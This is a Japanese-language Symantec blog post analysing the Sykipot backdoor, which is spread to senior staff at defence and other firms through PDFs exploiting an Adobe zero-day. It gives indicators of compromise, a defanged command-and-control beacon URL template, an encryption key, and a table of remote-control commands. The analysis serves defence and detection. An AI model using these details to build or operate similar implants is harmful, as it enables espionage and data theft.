技術解析に当たった、Stephen Doherty、Andrea Lelli、Nicolas Falliere、Paul Mangan、Sean Kiernan の各氏に感謝します。
最近シマンテックは、Adobe 製品で確認された脆弱性を利用する攻撃について 2 つのブログ(リンク 1、リンク 2)を投稿しました。これらの攻撃は、Sykipot というマルウェア群を使って長期的に続いている一連の攻撃の一部です。Sykipot は、少なくとも数年前から標的型攻撃に利用されており、未確定ながらその日付は 2006 年までさかのぼることができます。最近では 2011 年 12 月 1 日に大きな波があり、Adobe Reader と Adobe Acrobat のゼロデイ脆弱性(CVE-2011-2462)を悪用した PDF が多数の組織に送られてきました。
シマンテックは、これらの攻撃で使われた一連のトロイの木馬を「Sykipot」として分類しており、JS.Sykipot や Backdoor.Sykipot などの検出名もこれに含まれます。
攻撃者の目的は、知的財産を引き出して任意のリモートサーバーに送信することです。標的となった組織によって異なりますが、狙われているデータは設計、財務、製造、戦略などさまざまな分野の計画情報と考えられます。Sykipot を使う攻撃者がこれまでに関与した業種も多岐にわたりますが、その大部分は軍需産業です。
攻撃者がゼロデイ脆弱性を利用する攻撃は、これが初めてではありません。2010 年 3 月には、Sykipot の攻撃者は Internet Explorer の不具合(Microsoft Internet Explorer iepeers.dll に存在するリモートコード実行の脆弱性(BID 38615))を悪用したことがあります。
この標的型攻撃は長期にわたって継続していることから、攻撃者は豊富な資金力を持ち、価値の高い特定の情報を意図的に狙っていると考えられています。
Sykipot による今回の攻撃では、特に英国と米国で次のような業種の企業が標的とされましたが、これに限定されてはいません。
- 軍需企業
- 電気通信
- コンピュータハードウェア
- 化学
- エネルギー
- 政府系機関
攻撃者は一貫して標的型の電子メール攻撃を使っており、メールにはリンクが記載されているか、悪質なファイルが添付されています。どちらの場合も、攻撃者はパッチ修正されていないアプリケーションの不具合(ゼロデイ脆弱性)を悪用します。あるいは単純に、標的のコンピュータで脆弱なソフトウェアが実行されていることを期待して既知の悪用コードを利用します。今月の初めから確認されている、このようなメールの例を以下に示します。
標的とする人物に関して、攻撃者はかなりの時間をかけて調査を行ったようです。Adobe Acrobat と Acrobat Reader の脆弱性を悪用する悪質なメールの受信者と想定されているのは、ほとんどが上級の役職者であり、なかには組織の経営幹部(CEO、COO、CIO、CFO、CTOなど)や副社長、部長クラスなども含まれています。こうした上級役職者は、機密情報や、知的財産が保存されているコンピュータにアクセスできる可能性が高く、攻撃者はそれを狙っているのです。また、上級役職者のコンピュータやそこから盗み出した情報を利用すれば、一般従業員や、必要な情報の含まれるコンピュータに対する攻撃をしかけることも可能になります。
攻撃者が Sykipot のファイル名に使うのは常に、[削除済み]-weapons.scr、[削除済み]_af_navy.scr、occupy-wall-street-[削除済み].scr など、人の注意をひきそうなタイトルです。
シマンテックが確認した結果、コンピュータに感染すると、攻撃者はまずシステムとネットワークの情報を収集する調査コマンドを発行し、そのコンピュータが間違いなく標的としたホストであることを確認します。間違いなければ、攻撃者は特有のカスタムコマンドを感染コンピュータに発行し、目的の情報を検索して引き出します。
脅威の詳細
最近の攻撃では、悪質な PDF を開くと Sykipot が実行され、まず正常な PDF のコピーを表示したうえで、次のプロセスに Skyipot をインジェクトします。
- iexplore.exe
- outlook.exe
- firefox.exe
Skyipot は、「pretty.exe」というファイル名(コンパイル日は 2011 年 11 月 22 日)でローカルのフォルダにもコピーされます。
Skyipot の DLL には複数の補助ファイルがあり、それらはローカルの設定フォルダにコピーされます。補助ファイルの名前と機能は次のとおりです。
| ファイル名 |
機能 |
| Gtpretty.tmp |
C&C からの命令 |
| Gdtpretty.tmp |
C&C からの命令を復号したバージョン |
| Pdtpretty.tmp |
ログファイル |
| Ptpretty.tmp |
ログファイルを暗号化したバージョン |
今回の亜種は、HTTPS を介してコマンド & コントロールサーバー(www [ドット] prettylikeher [ドット])に接続します。また、この攻撃にはキーとして「19990817」(「1990 年 8 月 17 日」という日付を意味するようです)を使う暗号化方式も基礎として使われています。
コマンド & コントロールサーバーは、機密情報を検索して引き出すために攻撃者がカスタムコマンドを発行する前にシステムとネットワークの情報を送信するように指示するコマンドを、Sykipot に自動的に送信するように設定されています。
以前の攻撃でも類似の処理が実行されたことがあり、それについてはこちらをご覧ください。
Sykipot は、以下の GET 要求を使ってコマンド& コントロールサーバーに ping を送信し続けます。
https://[C&C ドメイン]/asp/kys_allow_get.asp?name=getkys.kys&hostname=[コンピュータ名]-[IP アドレス]-pretty20111122
HTTP 要求を送信するときには、ハードコード化された www.yahoo.com のリファラーも使われます。
Sykipot でサポートされているのは、以下のコマンドです。
| コマンド |
機能 |
| cmd |
CreateProcess を使ってコマンドを実行し、設定されているログファイルにその結果を記録する |
| door |
以下に示す 5 つのサブコマンドをサポートするコマンド |
| time |
C&C へのクエリーに対する遅延タイマーを設定する |
| getfile |
ファイルをダウンロードする |
| putfile |
ファイルをアップロードする |
「door」コマンドでサポートされる 5 つのサブコマンドは、次のとおりです。
| 「door」のサブコマンド |
機能 |
| shell |
特に処理なし |
| run |
WinExec を利用してコマンドを実行する |
| reboot |
コンピュータを再起動する |
| kill |
プロセスを終了する |
| process |
未実装 |
以上のコマンドのほかに、Sykipot はコマンドラインの「-uninstall」スイッチも受け付け、自身をアンインストールできるようになっています。アンインストールが実行された場合には、Sykipot によってインジェクトされたプロセスも終了します。
解析した Sykipot サンプルには、中国語のエラーメッセージ文字列も含まれており、これは Sykipot のパッケージ化に使われたツールに対応しているようです。
英語に翻訳すると次のようになります。
Binding document,(文書をバインド中、)
Read the first file to bind error! Binding document,(エラーをバインドする最初のファイルを読み込む! 文書をバインド中、)
To bind file to read the second error! Binding document,(2 番目のエラーを読み込むファイルをバインドする! 文書をバインド中、)
Open the file you want to bind the second error! Binding document,(2 番目のエラーをバインドするファイルを開く! 文書をバインド中、)
Open the first file to bind error! Binding document,(エラーをバインドする最初のファイルを開きます! 文書をバインド中、)
Create a binding file generated after synthesis Error! Binding document,(合成エラー後に生成されたバインドファイルを開く! 文書をバインド中、)
Error cannot locate the file itself! Binding document,(エラー、ファイル自体が見つかりません! 文書をバインド中、)
Cannot read the contents of their file error! Binding document,(ファイルエラーの内容を読み取れません! 文書をバインド中、)
Error opening the file itself! Binding document,(エラー、ファイル自体を開けません! 文書をバインド中、)
Error distribution of the length of the file itself! Binding document,(エラー、ファイル自体の長さを分配できません! 文書をバインド中、)
Its zero-length file error! Error(ゼロ長ファイルエラー! エラー)
確認されている Sykipot のドメインは次のとおりです。
上記のドメインに加えて、シマンテックが得たデータからは、以下のサイトも長期的なこの攻撃に関与していると判断できます。
攻撃者の特徴
攻撃を特定の団体によるものと断定することは通常困難ですが、Sykipot のように攻撃が長期化している場合には、攻撃者の基本的な特徴をつかむ十分な傾向を知ることができます。
バックドアを利用するトロイの木馬それ自体はさほど高度にはコーディングされていないものの、この攻撃者は複数のゼロデイ脆弱性を発見するスキルを備えています。ボットネットの制御に利用されているコマンド & コントロールサーバーが膨大な数にのぼることを考えると、攻撃者は単独の個人ではなく集団だろうと推測されます。
このため、Sykipot の攻撃者は熟練した個人が組織化された集団のようであり、攻撃が長期にわたって続いていることから、一貫して資金も潤沢であることがうかがえます。
まとめ
Sykipot の攻撃者の目的は、さまざまな組織の上級役職者から機密文書を盗み出すことにあり、そのほとんどが軍事関係です。攻撃がこのように長期化していることと、以前からゼロデイ脆弱性を利用していることから、Sykipot の今後のバージョンでも新たなゼロデイ脆弱性が悪用される可能性は高いと考えられます。
シマンテック製品では、Sykipot を Backdoor.Sykipot として検出し、Adobe Acrobat と Adobe Reader に存在する U3D メモリ破損の脆弱性(BID 50922)を悪用しようとするファイルを Bloodhound.Exploit.439 として検出します。また、ファイルを作成し実行しようとする悪質な PDF は、SONAR を利用して事前に検出されます。
* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja にアクセスしてください。